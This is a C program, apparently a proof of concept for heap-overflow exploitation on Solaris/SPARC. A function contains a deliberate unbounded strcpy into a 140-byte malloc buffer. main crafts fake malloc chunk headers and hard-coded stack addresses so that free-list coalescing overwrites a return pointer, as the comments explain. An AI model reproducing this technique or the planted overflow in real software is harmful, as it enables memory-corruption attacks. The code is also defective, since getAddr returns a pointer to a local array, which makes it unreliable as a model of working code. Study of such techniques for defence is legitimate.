#include <stdio.h>


char* getStringBuffer(char *string)
{
  int buffSize = 140;

  char *buffer = (char*)malloc(buffSize);
 
  printf("String is at address:%p\n",&string);

  /* Violation!! */
  strcpy(buffer, string);

  return buffer;
}

char* getAddr()
{
  /* From fprintf, address of staticAddr.
     Once it is known, use it for calculations.
     Idea is to cancel out any deviation.
  */
  int staticAddr = 0;
  int deviation  = 0;
  char addr[63];

  staticAddr = 0xffbfeb58;
  deviation  = 0xffbfea0c; /* the return address as seen in debugger */

  fprintf(stdout,"Address is: %d and hex: %x\n",staticAddr, staticAddr);

  deviation = deviation + (staticAddr - (int)&staticAddr);

  memcpy(addr, &deviation, sizeof(int));
  addr[sizeof(int)] = '\0';

  fprintf(stdout,"Addr|%s|\n",addr);

  return addr;
}


int main(int argc, char *argv[])
{   
  char readString[256];
  int i = 0;
  char* addr = 0;

  strcpy((char*)&i, "\xff\xff\xff\xfe");
  printf("Value of 0xfffffffe is: %d\n",i);

  memset(readString,'A',144);
  
  addr = getAddr();
  

  /* size: \xff\xff\xff\xfe ** must be less than WORDSIZE
     fake-chunk: Create 2 fake chunks, 4 bytes past overflow
     of last malloc'ed buffer. Make sure flags/bits are taken
     care of as described in the paper to trigger coalesce
     operation and 4-byte overwrite is acheived.
     Overwrite Address: address-8=xff\xbf\xea\x0c [on stack, a return pointer]
     Overwrite with: \xff\xbf\xea\x14 [Your choice] 
     Intruction: 0xff2c7808 <t_delete+52>:  st  %o0, [ %o1 + 8 ]
   */
  snprintf(&(readString[144]), sizeof(readString)-145,
          "\xff\xff\xff\xfe\xff\xff\xff\xfeWWWW\xff\xbf\xea\x14"
          "ZZZZ\xff\xff\xff\xffRRRRSSSS"
          "XXXX%sUUUUVVVV",addr);
 
  readString[255]=0;
  

  printf("length of readString: %d\n",strlen(readString));
   

  for(i=0; i<10; i++)
  {
    char *buffer = getStringBuffer(readString);

    printf("ReadString is at address:%p\n",readString);
    printf("Loop: %d | String is: %s \t of len: %d \t at address:%p\n", i, buffer, 
           strlen(buffer), buffer);

    /* Free is never called!
     * free(buffer);
     */
  }

  return 0;
}
